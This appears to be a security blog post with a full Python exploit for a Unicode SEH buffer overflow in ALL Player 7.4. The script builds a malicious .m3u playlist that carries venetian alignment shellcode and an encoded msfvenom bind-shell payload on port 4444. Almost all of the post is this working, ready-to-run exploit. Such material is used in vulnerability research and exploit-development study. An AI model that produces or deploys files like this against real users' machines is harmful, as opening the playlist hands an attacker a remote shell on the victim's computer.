ALLPlayer 7.4 – Buffer Overflow (SEH Unicode)

After playing around with unicode stack overflow, I try to do it on an application called AllPlayer. Techniques used are not much different, so the result will be the same as the previous exploits.

This application never seems to be updated by the developer, ironically this application is widely used.

#!/usr/bin/python
# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode)
# Version: 7.4
# Date: 15-08-2017
# Exploit Author: f3ci
# Tested on: Windows 7 SP1 x86

head = "http://"
seh = "\x0f\x47" #0x0047000f
nseh = "\x61\x41" #popad align
junk = "\x41" * 301
junk2 = "\x41" * 45

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
#x86/unicode_mixed succeeded with size 782 (iteration=0)
#Payload size: 782 bytes
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"

#venetian
ven = "\x56" #push esi
ven += "\x41" #align
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41" #align
ven += "\x2d\x01\x01" #add eax,01000100
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret

buffer = head + junk + nseh + seh + ven + junk2 + buf

print len(buffer)
f=open("C:\Users\Lab\Desktop\player.m3u",'wb')
f.write(buffer)
f.close()

References
Exploit-DB version: https://www.exploit-db.com/exploits/42455/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About f3ci